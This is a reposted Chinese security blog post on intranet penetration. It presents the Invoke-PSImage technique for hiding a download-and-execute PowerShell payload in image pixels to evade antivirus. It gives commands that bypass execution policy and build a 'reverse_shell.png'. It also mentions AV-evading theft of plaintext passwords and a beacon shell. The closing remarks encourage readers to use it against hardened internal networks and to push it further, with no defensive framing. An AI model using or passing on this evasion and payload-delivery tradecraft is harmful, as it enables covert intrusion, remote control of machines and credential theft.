内网渗透

通过图片免杀执行远程powershell代码

字号+ 作者:klion's blog 来源:转载 2018-09-08 15:40 我要评论( )

通过图片免杀执行远程powershell代码......

 
https://github.com/klionsec/Invoke-PSImage
C:\>powershell -exec bypass
PS C:\> Import-Module .\Invoke-PSImage.ps1
PS C:\> Invoke-PSImage -Script .\Download-Execute-PS.ps1 -Image .\large.JPG -Out .\reverse_shell.png -Web
免杀抓取系统用户明文密码
 
通过图片免杀执行远程powershell代码
 
免杀弹回一个beacon的shell
 
通过图片免杀执行远程powershell代码
 
后话:
    逛facebook无意看到的,觉得还不错,顺便拿过来跟大家分享下,脚本主要作用就是把payload数据分散存到图片的每个像素中,最后到远端执行时,再重新遍历重组像素中的payload代码来执行,具体看脚本和触发代码即可知,不得不说,思路非常好,哼哼…其实,除了图片能存数据,还有其它很多的地方也都能存,这样也确实有一定的免杀效果,但nod实测时还是会被捕捉到,可能是download时被发现到了,对于一些比较变态的内网环境,大家不妨尝试下,毕竟,无痕执行相对还是比较好的,另外,图片像素务必要大,大到能完整装下你的payload,可继续深度利用的空间还很大,大家不妨自行尝试,废话不多说,祝,好运 ^_^

本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/hack/Intranet/715.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
网友点评
暂时未开启评论功能~